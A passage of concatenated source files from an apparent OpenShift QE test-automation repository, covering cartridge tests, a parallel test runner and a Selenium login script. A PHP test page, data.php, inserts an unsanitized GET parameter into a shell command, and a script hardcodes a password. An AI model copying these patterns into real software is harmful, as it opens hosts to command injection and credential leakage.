instance_ip = common.create_node(options.instance_tag, options.ami, options.image_size)\n    else:\n        print \"Warning: No specified ami, will launch the latest one\"\n        instance_ip = common.create_node(options.instance_tag, None, options.image_size)\n\n    os.environ['OPENSHIFT_libra_server'] = instance_ip\n    common.set_libra_server(instance_ip)\n\n\n    #Do TCMS authentication only once\n    tcmsobj = TCMS()\n    #print tcmsobj.server.TestCase.get_tags(141096)\n    tc_id_list = []\n    tc_tag_list = []\n    if options.testcase_ids != None:\n        tmp_list = options.testcase_ids.split(',')\n        for i in tmp_list:\n            tc_id_list.append(int(i.strip()))\n    elif options.testcase_tags != None:\n        tmp_list = options.testcase_tags.split(',')\n        for i in tmp_list:\n            tc_tag_list.append(i.strip())\n    #print \"--->\", tc_tag_list\n\n    if options.parallel:\n        print \"INFO: Parallel mode...\\n\"\n        PARALLEL_MODE = True\n    else:\n        print \"INFO: Normal mode...\\n\"\n\n\n    # Priority for TCMS Arguments: -i -> -t\n    # Priority for test case filter arguments: -c -> -g\n    if options.testrun_id != None:\n        # This branch is when you want to use existing test run\n        test_run_id = options.testrun_id\n        print \"Using existing TCMS Test Run - https://tcms.engineering.redhat.com/run/%s/\" %(test_run_id)\n        if len(tc_id_list) != 0:\n            run_tests(test_run_id, tc_id_list)\n        elif len(tc_tag_list) != 0:\n            tc_id_list = tcmsobj.get_testcase_id_list_by_tag(tc_tag_list)\n            run_tests(test_run_id, tc_id_list)\n        else:\n            run_tests(test_run_id)\n    elif options.testrun_tag != None: \n        # This branch is when you want to create a new test run\n        if len(tc_id_list) != 0:\n            test_run_id = create_test_run(options.testrun_tag, tc_id_list)\n            run_tests(test_run_id)\n        elif len(tc_tag_list) != 0:\n            tc_id_list = tcmsobj.get_testcase_id_list_by_tag(tc_tag_list)\n            test_run_id = create_test_run(options.testrun_tag, tc_id_list)\n            run_tests(test_run_id)\n        else:\n            print usage\n            raise common.InputError(\"Enter test case id list using option '-c' or test case tag list using option '-g'\")\n    else:\n        print usage\n        raise common.InputError(\"Enter existing TCMS test run id using option '-i' or create new TCMS test run using option '-t'\")\n\n\ndef 
run_queues_in_sequence():\n while not q.empty():\n (cmd, args) = q.get()\n tcmsobj.update_testcaserun_status(args['testcaserun_id'], 'RUNNING')\n os.system(cmd)\n \ndef run_queues_in_parallel():\n print \"INFO: Time for lunch? Let's Fork()...\"\n i=0 #counter\n #let's fork...\n child_pid = os.fork()\n os.system(\"rm -f Q*.log\")\n if child_pid == 0:\n print \"Child Process: PID# %s\" % os.getpid()\n q2_account = get_email(2)\n log_file=\"/tmp/curr_tc_log-%s\"%q2_account\n\n qsize=q2.qsize()\n domain=common.getRandomString(12)\n while not q2.empty():\n #update counter...\n i=i+1\n (cmd, args) = q2.get()\n tcmsobj.update_testcaserun_status(args['testcaserun_id'], 'RUNNING')\n print '\\033[93m',\"\\n[%d/%d]*********************Q2************************\\n\"%(i, qsize), cmd, '\\033[0m'\n\n os.environ['OPENSHIFT_user_email']=q2_account\n if os.environ.has_key('OPENSHIFT_user_passwd2'): #let's change passwrd as well\n os.environ['OPENSHIFT_user_passwd'] = os.environ['OPENSHIFT_user_passwd2']\n\n cmd = \"rm -rf Q2;mkdir -p Q2;cd Q2; \" +cmd+ \" 2>&1 | tee -a ../Q2.log\"\n ret = os.system(cmd)\n\n #if (ret==255 and i==1):\n # print \"Aborted -- Initialization failed.\"\n # sys.exit(ret)\n\n\n print '\\033[93m',\"\\n*********************Q2's END************************\\n\", '\\033[0m'\n\n else:\n print \"Parent Process: PID# %s\" % os.getpid()\n q1_account = get_email()\n log_file=\"/tmp/curr_tc_log-%s\"%q1_account\n qsize=q.qsize()\n while not q.empty():\n #update counter...\n i=i+1\n (cmd, tc) = q.get()\n print '\\033[94m',\"\\n[%d/%d]********************Q1****************************\\n\"%(i,qsize), cmd, '\\033[0m'\n \n os.environ['OPENSHIFT_user_email']=q1_account\n cmd = \"rm -rf Q1;mkdir -p Q1;cd Q1; \" +cmd+\" 2>&1 |tee -a ../Q1.log\"\n ret = os.system(cmd)\n\n #if (ret==255 and i==0):\n # print \"Aborted -- Initialization failed.\"\n # sys.exit(ret)\n\n\n print '\\033[94m',\"\\n*********************Q1's END************************\\n\", \n print \"Waiting for child to end...\"\n os.waitpid(child_pid, 0) # make sure the child process gets cleaned up\n print \"Done. 
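# run_queues_in_parallel() above is the classic fork/work/waitpid split: the
# child drains one queue and exits, the parent drains the other and then
# reaps the child. Stripped of the TCMS and rhc detail, the skeleton is
# (POSIX only; each job is a no-argument callable):
import os

def run_in_two_processes(parent_jobs, child_jobs):
    pid = os.fork()
    if pid == 0:
        for job in child_jobs:   # child: work through its share...
            job()
        os._exit(0)              # ...then exit without unwinding the parent
    for job in parent_jobs:      # parent: work in the meantime
        job()
    os.waitpid(pid, 0)           # reap the child before declaring the run done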
Updating testrun status to FINISHED...\"\n # Update the test run status to FINISHED \n tcmsobj.update_testrun(testrun_id, {'status' : 1})\n print \"Done.\"\n print '\\033[0m'\n\n\ndef queue_cmd(testname, args={}):\n global COUNTER\n instance_ip = common.get_instance_ip()\n\n cmd = \"%s/rhtest --instance_ip=%s %s \" % (file_path, instance_ip, testname)\n\n if (PARALLEL_MODE==True):\n if COUNTER==0: #this is certainly INIT script, which we need in both queues\n q.put([cmd, args])\n q2.put([cmd, args])\n elif COUNTER%2==0:\n q.put([cmd, args])\n else:\n q2.put([cmd, args])\n\n COUNTER=COUNTER+1\n else:\n #simple queue\n q.put([cmd, args])\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.7298735976219177, "alphanum_fraction": 0.7378576397895813, "avg_line_length": 27.358489990234375, "blob_id": "56ecfa0c0b804831f78855ec671c31f377a99358", "content_id": "faf17eed2c0603da640224e815b656f975b6e6c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1503, "license_type": "no_license", "max_line_length": 75, "num_lines": 53, "path": "/automation/Example/em_no_design.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\n\n# from selenium.webdriver.support.ui import WebDriverWait\n# from selenium.webdriver.support import expected_conditions as EC\n\n\ntest_env = 'https://bzweb01-qe.app.eng.rdu.redhat.com'\ndev_env = 'https://bzweb01-devel.app.eng.rdu.redhat.com'\n\nusername = '[email protected]'\npwd = 'redhat'\n\ndriver = webdriver.Firefox()\ndriver.get(dev_env)\ndriver.maximize_window()\n\nlogin_link_id = 'login_link_top'\nlogin_user_input_id = 'Bugzilla_login_top'\nlogin_user_pwd_id = 'Bugzilla_password_top'\nadmin_link_text = 'Administration'\nadmin_link_xpath = '//div/ul/li[11]/a'\nadmin_link_css = '#header ul li a[href=\"admin.cgi\"]'\n\nlogin_link = driver.find_element(by=By.ID, value=login_link_id)\nlogin_user_input = driver.find_element(by=By.ID, value=login_user_input_id)\nlogin_user_pwd = driver.find_element(by=By.ID, value=login_user_pwd_id)\n\nlogin_link.click()\n\nlogin_user_input.send_keys(username)\nlogin_user_pwd.send_keys(pwd)\nlogin_user_pwd.send_keys(Keys.RETURN)\n\n\n# How to deal with ajax\n\n# way1: static time sleep\n#admin_link = driver.find_element(By.LINK_TEXT, admin_link_text)\n#import time\n#time.sleep(5)\n\n# way2: smart wait\n#WebDriverWait(driver, 10).until(\n# EC.visibility_of_element_located((By.XPATH, admin_link_xpath)))\n#admin_link = driver.find_element(By.XPATH, admin_link_xpath)\n#admin_link.click()\n\n# way3: enter into related page via url\n#driver.get(dev_env + '/admin.cgi')\n\ndriver.close()\n" }, { "alpha_fraction": 0.46589016914367676, "alphanum_fraction": 0.4700499176979065, "avg_line_length": 29.049999237060547, "blob_id": "a5e3da8c9e4f80f298025ea74a1b28c22a560011", "content_id": "ca6f5f2ddfa387b038183f64413cf0c9552de15c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 1202, "license_type": "no_license", "max_line_length": 89, "num_lines": 40, "path": "/automation/open/testmodules/RT/cartridge/app_template/bigdata/datadir/data.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\nif(!empty($_GET[\"action\"])) {\n if(empty($_GET[\"size\"])) {\n $size = \"300\";\n }\n else {\n $size = $_GET[\"size\"];\n }\n $OPENSHIFT_DATA_DIR = 
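# em_no_design.py above walks through three ways to survive a link that an
# AJAX call builds late: a fixed sleep, an explicit WebDriverWait, or loading
# the target URL directly. The explicit-wait variant, factored into a small
# reusable helper (the locator in the usage comment is a placeholder):
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

def click_when_visible(driver, locator, timeout=10):
    """Block until the located element is visible, then click it."""
    element = WebDriverWait(driver, timeout).until(
        EC.visibility_of_element_located(locator))
    element.click()

# click_when_visible(driver, (By.LINK_TEXT, "Administration"))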
getenv(\"OPENSHIFT_DATA_DIR\");\n if($_GET[\"action\"] == \"create\") {\n $cmd = \"dd if=/dev/urandom of=\".$OPENSHIFT_DATA_DIR.\"bigfile bs=1M count=\".$size;\n $output = system($cmd, $ret);\n echo \"Command: \".$cmd.\"<br />\";\n if($ret == 0) {\n echo \"The bigfile has been created.<br />\";\n }\n else {\n echo \"Failed to create bigfile under OPENSHIFT_DATA_DIR\";\n }\n }\n elseif($_GET[\"action\"] == \"delete\") {\n $cmd = \"rm -f \".$OPENSHIFT_DATA_DIR.\"bigfile\";\n $output = system($cmd, $ret);\n echo \"The bigfile has been deleted.\";\n }\n elseif($_GET[\"action\"] == \"show\") {\n $filepath = $OPENSHIFT_DATA_DIR.\"bigfile\";\n $cmd = \"ls -lh \".$filepath;\n echo \"Command: \".$cmd.\"\\n\";\n $output = system($cmd, $ret);\n if(file_exists($filepath)) {\n echo \"<br />\".$output;\n echo \"<br />The bigfile exists.\";\n }\n else {\n echo \"<br />The bigfile doesnot exist.\";\n }\n }\n}\n?>\n" }, { "alpha_fraction": 0.5879629850387573, "alphanum_fraction": 0.5941358208656311, "avg_line_length": 36.79166793823242, "blob_id": "6cf529a4a7ff4d371ce2d8af70640b966148c411", "content_id": "a5e7b81f3ba969529466706458644af27dfb28fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4536, "license_type": "no_license", "max_line_length": 163, "num_lines": 120, "path": "/automation/open/testmodules/RT/cartridge/embed_mysql_to_php.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nMichal Zimen\[email protected]\nApr 05, 2012\n[rhc-cartridge] embed MySQL instance to PHP application\nhttps://tcms.engineering.redhat.com/case/122451/?from_plan=4962\n\"\"\"\nimport os\nimport sys\n\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[rhc-cartridge] embed MySQL instance to an PHP application\"\n self.app_type = common.app_types[\"php\"]\n self.app_name = \"php4mysql\"\n self.mysql_v = common.cartridge_types['mysql']\n self.steps_list = []\n\n common.env_setup()\n \n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass EmbedMysqlToPhp(OpenShiftTest):\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\"Create a PHP app\", common.create_app, \n function_parameters=[self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n \n self.steps_list.append(testcase.TestCaseStep(\"Embed mysql to the app\", \n common.embed,\n function_parameters=[self.app_name, \"add-\" + common.cartridge_types['mysql']],\n expect_description=\"the mysql cartridge should be embedded successfully\",\n expect_return=0))\n\n def add_page(app_name):\n new_page = \"\"\"<?php\n$con=mysql_connect($_ENV[\"OPENSHIFT_MYSQL_DB_HOST\"].\":\".$_ENV[\"OPENSHIFT_MYSQL_DB_PORT\"], \n $_ENV[\"OPENSHIFT_MYSQL_DB_USERNAME\"], \n $_ENV[\"OPENSHIFT_MYSQL_DB_PASSWORD\"]) or die(mysql_error());\n\nmysql_select_db($_ENV[\"OPENSHIFT_APP_NAME\"], $con);\nmysql_query(\"DROP TABLE IF EXISTS ucctalk\", $con);\nmysql_query(\"CREATE TABLE ucctalk (speaker CHAR(30), title CHAR(60))\",$con);\nmysql_query(\"INSERT INTO ucctalk (speaker,title) VALUES ('Jeremy Zawodny', 'Optimizing MySQL'), ('Sanja Byelkin', 'Sub-Queries in MySQL'), ('Tim Bunce', 'Advanced Perl DBI')\",$con);\n$result=mysql_query(\"SELECT * FROM ucctalk\",$con);\nwhile($row=mysql_fetch_array($result))\n{\n echo 
$row['speaker'],\", \",$row['title'],\"<br>\";\n}\nmysql_close($con);\n?>\"\"\"\n new_filename = \"mysql.php\"\n f = open(\"%s/php/%s\"%(self.app_name, new_filename), \"w\")\n f.write(new_page)\n f.close()\n cmd = \"cd %s; git add php/%s && git commit -a -m 'changes' && git push\"%(self.app_name, new_filename)\n (status, output) = common.command_getstatusoutput(cmd)\n return status\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Create a page which does some operation with mysql database like mysql.php:\",\n add_page,\n function_parameters=[self.app_name],\n expect_description=\"The page should be added without errros\",\n expect_return=0))\n\n def verify(app_name):\n url = OSConf.get_app_url(self.app_name)\n return common.grep_web_page(url+\"/mysql.php\", 'Jeremy')\n\n self.steps_list.append(testcase.TestCaseStep(\"Verify the MySQL functionality...\",\n verify,\n function_parameters=[self.app_name],\n expect_description=\"The page should be added without errros\",\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Remove embedded mysql from the app\", \n common.embed,\n function_parameters=[self.app_name, \"remove-\" + common.cartridge_types['mysql']],\n expect_description=\"the mysql should be removed successfully\",\n expect_return=0))\n\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EmbedMysqlToPhp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5562242269515991, "alphanum_fraction": 0.5683717727661133, "avg_line_length": 43.41584014892578, "blob_id": "53ec78546cd6734b37d238b99da15147322b2625", "content_id": "1aeec70995f7905b59e853fcaf069bbb3047d3e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8973, "license_type": "no_license", "max_line_length": 443, "num_lines": 202, "path": "/automation/open/testmodules/RT/cartridge/postgresql_usage.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\nFeb 14, 2012\n\n[US1386][Runtime][cartridge]Embed PostgreSQL cartridge to {rack, perl, wsgi, php, jbossas, jbossews, nodejs, ruby-1.9} app\nhttps://tcms.engineering.redhat.com/case/128838/\nhttps://tcms.engineering.redhat.com/case/128837/\nhttps://tcms.engineering.redhat.com/case/128836/\nhttps://tcms.engineering.redhat.com/case/128835/\nhttps://tcms.engineering.redhat.com/case/128834/\nhttps://tcms.engineering.redhat.com/case/137725/\n\"\"\"\n\nimport os\nimport commands\n\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US1386][Runtime][cartridge]Embed PostgreSQL cartridge to {rack, perl, wsgi, php, jbossas, jbosseap, nodejs} app\"\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"Missing Variant, using `zend` as default\")\n self.test_variant = 'zend'\n\n try:\n self.scalable = 
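# The mysql.php page above assembles its connection purely from the
# OPENSHIFT_MYSQL_DB_* environment variables the cartridge injects. The same
# lookup in Python, returned as a plain dict a MySQL driver could consume
# (only the variable names are taken from the page above; the key names a
# given driver expects may differ):
import os

def mysql_params_from_env():
    return {
        "host": os.environ["OPENSHIFT_MYSQL_DB_HOST"],
        "port": int(os.environ["OPENSHIFT_MYSQL_DB_PORT"]),
        "user": os.environ["OPENSHIFT_MYSQL_DB_USERNAME"],
        "passwd": os.environ["OPENSHIFT_MYSQL_DB_PASSWORD"],
        "db": os.environ["OPENSHIFT_APP_NAME"],
    }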
self.config.tcms_arguments['scalable']\n except:\n self.scalable = False\n if self.scalable:\n self.scalable = True\n\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.app_type = common.app_types[self.test_variant]\n self.app_name = common.getRandomString(10)\n self.git_repo = './' + self.app_name\n self.random1 = common.getRandomString(30)\n self.random2 = common.getRandomString(30)\n\n self.steps_list = []\n\n self.app_config = {\n 'php' : { 'destination' : 'php', 'suffix' : 'php' },\n 'zend' : { 'destination' : 'php', 'suffix' : 'php' },\n 'perl' : { 'destination' : 'perl', 'suffix' : 'pl' },\n 'wsgi' : { 'destination' : 'wsgi/application', 'suffix' : 'py' },\n 'python' : { 'destination' : 'wsgi/application', 'suffix' : 'py' },\n 'python-2.7' : { 'destination' : 'wsgi/application', 'suffix' : 'py' },\n 'python-3.3' : { 'destination' : 'wsgi/application', 'suffix' : 'py' },\n 'rack' : { 'destination' : '', 'suffix' : 'rb' },\n 'ruby' : { 'destination' : '', 'suffix' : 'rb' },\n 'ruby-1.9': { 'destination' : '', 'suffix' : 'rb' },\n 'jbossas' : { 'destination' : 'src/main/webapp', 'suffix' : 'jsp' },\n 'jbosseap': { 'destination' : 'src/main/webapp', 'suffix' : 'jsp' },\n 'jbossews': { 'destination' : 'src/main/webapp', 'suffix' : 'jsp' },\n 'jbossews2': { 'destination' : 'src/main/webapp', 'suffix' : 'jsp' },\n 'nodejs' : { 'destination' : '', 'suffix' : 'js'}}\n\n common.env_setup()\n\n def finalize(self):\n pass\n\nclass PostgresqlUsage(OpenShiftTest):\n\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\n 'Creating an application',\n common.create_app,\n function_parameters = [ self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, \n True, self.git_repo, self.scalable],\n expect_description = 'The app should be created successfully',\n expect_return = 0))\n\n #2\n self.steps_list.append(testcase.TestCaseStep(\n 'Embedding PostgreSQL to the application',\n common.embed,\n function_parameters = [ self.app_name, \n 'add-%s' % ( common.cartridge_types['postgresql'] ), \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd ],\n expect_description = 'PostgreSQL cartridge should be embedded successfully',\n expect_return = 0))\n\n #3\n self.steps_list.append(testcase.TestCaseStep(\n 'Configuring the application',\n self.app_setup,\n expect_description = \"App configuration + deployment should be successfull\",\n expect_return = 0))\n\n #4\n self.steps_list.append(testcase.TestCaseStep(\n 'Writing to the database - Step #1',\n self.postgresql_check_webpage_output,\n function_parameters = [ \"data1\", \"Please visit /show\\..+ to see the data\" ],\n expect_description = \"INSERT operation should be successfull\",\n expect_return = 0))\n\n #5\n self.steps_list.append(testcase.TestCaseStep(\n 'Checking the output of the database - Step #1',\n self.postgresql_check_webpage_output,\n function_parameters = [ \"show\", self.random1 ],\n expect_description = \"We should get the first random value from the database\",\n expect_return = 0))\n\n #6\n self.steps_list.append(testcase.TestCaseStep(\n 'Writing to the database - Step #2',\n self.postgresql_check_webpage_output,\n function_parameters = [ \"data2\", \"Please visit /show\\..+ to see the data\" ],\n expect_description = \"INSERT operation should be successfull\",\n expect_return = 0))\n\n #7\n self.steps_list.append(testcase.TestCaseStep(\n 'Checking the output of the database - Step #2',\n self.postgresql_check_webpage_output,\n 
function_parameters = [ \"show\", self.random2 ],\n expect_description = \"We should get the second random value from the database\",\n expect_return = 0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n def app_setup(self):\n user = OSConf.OSConf()\n user.load_conf()\n apps_cache = OSConf.get_apps(user)\n psql_version = common.cartridge_types['postgresql']\n\n postgresql_url = apps_cache[self.app_name]['embed'][psql_version]['url']\n postgresql_user = apps_cache[self.app_name]['embed'][psql_version]['username']\n postgresql_passwd = apps_cache[self.app_name]['embed'][psql_version]['password']\n postgresql_dbname = apps_cache[self.app_name]['embed'][psql_version]['database']\n postgresql_port = apps_cache[self.app_name]['embed'][psql_version]['port']\n\n app_setup_steps = [\n \"cp -v %s/app_template/postgresql/%s/* %s/%s\" % ( WORK_DIR, self.test_variant, self.git_repo, self.app_config[self.test_variant]['destination'] ),\n \"find %s/%s -type f -print | while read file ; do echo 'Editing file: ' $file ; sed -i -e 's/#pgsql_user#/%s/;s/#pgsql_passwd#/%s/;s/#pgsql_dbname#/%s/;s/#pgsql_host#/%s/;s/#pgsql_port#/%s/;s/#str_random1#/%s/;s/#str_random2#/%s/' $file; done\" % (self.git_repo, self.app_config[self.test_variant]['destination'], postgresql_user, postgresql_passwd, postgresql_dbname, postgresql_url, postgresql_port, self.random1, self.random2 ), \n \"cd %s\" % (self.git_repo),\n \"git add %s\" % (self.app_config[self.test_variant]['destination'] or '.' 
),\n            \"git commit -a -m deployment\",\n            \"git push\" ]\n\n        if self.test_variant in ('ruby', 'ruby-1.9', 'rack'):\n            app_setup_steps.insert(3, 'bundle install' )\n            app_setup_steps.insert(4, 'bundle check' )\n        if self.test_variant == 'nodejs':\n            app_setup_steps.insert(3, 'rm -f deplist.txt' ) # bug if the pg dependency is there...\n        if self.test_variant in ('python-2.7','python-3.3'):\n            #app_setup_steps.insert(3, \"cp -f %s/../client/data/snapshot_restore_mysql_data/setuppostgresql.py ./setup.py\" % (WORK_DIR))\n            app_setup_steps.insert(3, \"sed -i -e \\\"s/#\\s*'psycopg2',/'psycopg2',/g\\\" setup.py\")\n        \n        ( ret_code, ret_output) = commands.getstatusoutput(\" && \".join(app_setup_steps))\n        print ret_output\n        return ret_code\n\n    def postgresql_check_webpage_output(self, path, pattern):\n        app_url = OSConf.get_app_url(self.app_name)\n        return common.grep_web_page( \"%s/%s.%s\" % ( app_url, path, self.app_config[self.test_variant]['suffix']), pattern, count=10)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(PostgresqlUsage)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6057786345481873, "alphanum_fraction": 0.6101861000061035, "avg_line_length": 28.171428680419922, "blob_id": "b2fa9152042fc4f9ec7d38220466d7cc2db8ea01", "content_id": "636c39841486db3489744bafd3cc225745bf3859", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2042, "license_type": "no_license", "max_line_length": 210, "num_lines": 70, "path": "/automation/open/testmodules/RT/client/create_app_without_dns.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n    INTERACTIVE = False\n\n    def initialize(self):\n\tself.user_email = os.environ[\"OPENSHIFT_user_email\"]\n \tself.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n\tself.app_name = common.getRandomString(10)\n        try:\n            self.app_type = self.config.test_variant\n        except:\n            self.app_type = 'php'\n        tcms_testcase_id = 141753\n\n \tcommon.env_setup()\n \tself.steps_list = []\n\n    def finalize(self):\n        pass\n\n\nclass CreateAppWithoutDns(OpenShiftTest):\n    def test_method(self):\n\t\n        self.steps_list.append(testcase.TestCaseStep(\"Create an app with --no-dns\",\n            \"rhc app create %s %s -l %s -p '%s' --no-git --no-dns %s\"%(self.app_name, common.app_types[self.app_type], self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n            unexpect_string_list=[\"Cloning into\"],\n            expect_return=0))\n\n        case = testcase.TestCase(\"create an app with --no-dns option\",\n                self.steps_list)\n\n        def cleaning():\n            cmd = \"rhc app destroy %s -l %s -p '%s' --confirm %s\"%(self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS)\n            common.command_get_status(cmd)\n\n        case.add_clean_up(cleaning)\n        case.run()\n\n        if case.testcase_status == 'PASSED':\n            return self.passed(\"%s passed\" % self.__class__.__name__)\n        if case.testcase_status == 'FAILED':\n            return self.failed(\"%s failed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    
suite.add_test(CreateAppWithoutDns)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n" }, { "alpha_fraction": 0.5736401677131653, "alphanum_fraction": 0.5845188498497009, "avg_line_length": 29.240507125854492, "blob_id": "06ae2738aef70c9df8ec77da74f742ec8029f9e3", "content_id": "3a21e9764e268297594cfea48b90adfdfaa07a31", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2390, "license_type": "no_license", "max_line_length": 110, "num_lines": 79, "path": "/automation/open/testmodules/RT/cartridge/ssh_selinux_transition.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: ssh_selinux_transition.py\n# Date: 2012/02/13 10:07\n# Author: [email protected]\n#\n\nimport sys\nimport os\nimport testcase\nimport common\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n    def initialize(self):\n        self.summary = \"[US1657][Runtime][rhc-cartridge] SSH Transition protection\"\n        try:\n            self.app_type = self.config.test_variant\n        except:\n            self.app_type = 'php'\n\n        self.app_name = 'selinuxapp'\n        self.tcms_testcase_id = 130919\n\n        self.steps_list = []\n\n        common.env_setup()\n\n    def finalize(self):\n        os.system(\"rm -rf %s\"%(self.app_name))\n\nclass SshSelinuxTransition(OpenShiftTest):\n    def test_method(self):\n        self.steps_list.append(testcase.TestCaseStep(\"Create sample application\",\n            common.create_app,\n            function_parameters=[self.app_name, \n                                 common.app_types[self.app_type], \n                                 self.config.OPENSHIFT_user_email, \n                                 self.config.OPENSHIFT_user_passwd],\n            expect_return=0))\n\n        pexpect_cmd = [\n            ('sendline', 'ps -efwwZ |grep grep'),\n            ('expect', 'unconfined_u:system_r:openshift_t:.*grep grep')\n            ]\n\n        self.steps_list.append(testcase.TestCaseStep(\"Login through RHCSH and check the SELinux label\",\n            common.rhcsh,\n            function_parameters = [self.app_name, pexpect_cmd],\n            expect_return = 0,\n            expect_description=\"Tenants' sshd process should be labeled as openshift_t instead of ssh_t.\"))\n\n\n        case = testcase.TestCase(self.summary, self.steps_list)\n        try:\n            case.run()\n        except testcase.TestCaseStepFail:\n            return self.failed(\"%s failed\" % self.__class__.__name__)\n\n        if case.testcase_status == 'PASSED':\n            return self.passed(\"%s passed\" % self.__class__.__name__)\n        if case.testcase_status == 'FAILED':\n            return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(SshSelinuxTransition)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n\n#\n# end of ssh_selinux_transition.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5359981060028076, "alphanum_fraction": 0.5426732301712036, "avg_line_length": 49.135459899902344, "blob_id": "a4ac37c8fa1dcada758731af6b2564be56063c23", "content_id": "3590178ff005a50167b4d5068f51192b3bd9701b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12584, "license_type": "no_license", "max_line_length": 220, "num_lines": 251, "path": "/automation/open/testmodules/RT/cartridge/add_control_remove_mongodb.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n    INTERACTIVE = False\n\n    def initialize(self):\n        self.summary = \"[US1209][US1347][Runtime][cartridge]embed MongoDB to all kinds of 
app\\n[US1209][Runtime][cartridge]Control embed mongodb\"\n        try:\n            test_name = self.get_variant()\n        except:\n            self.info(\"Missing variant, used 'php' as default\")\n            test_name = 'php'\n\n        try:\n            self.environment = self.config.options.run_mode\n        except:\n            self.info(\"Missing self.config.options.run_mode, used 'DEV' as default\")\n            self.environment = \"DEV\"\n        self.info(\"VARIANT: %s\"%test_name)\n        self.app_type = common.app_types[test_name]\n        self.app_name = common.getRandomString(10)\n        tcms_testcase_id=121913\n        self.steps_list = []\n        common.env_setup()\n\n    def finalize(self):\n        os.system(\"rm -rf %s* \"%(self.app_name))\n\nclass AddControlRemoveMongodb(OpenShiftTest):\n    def test_method(self):\n        app_name = self.app_name\n        self.steps_list.append(testcase.TestCaseStep(\"Create a %s application\" %(self.app_type),\n            common.create_app,\n            function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n            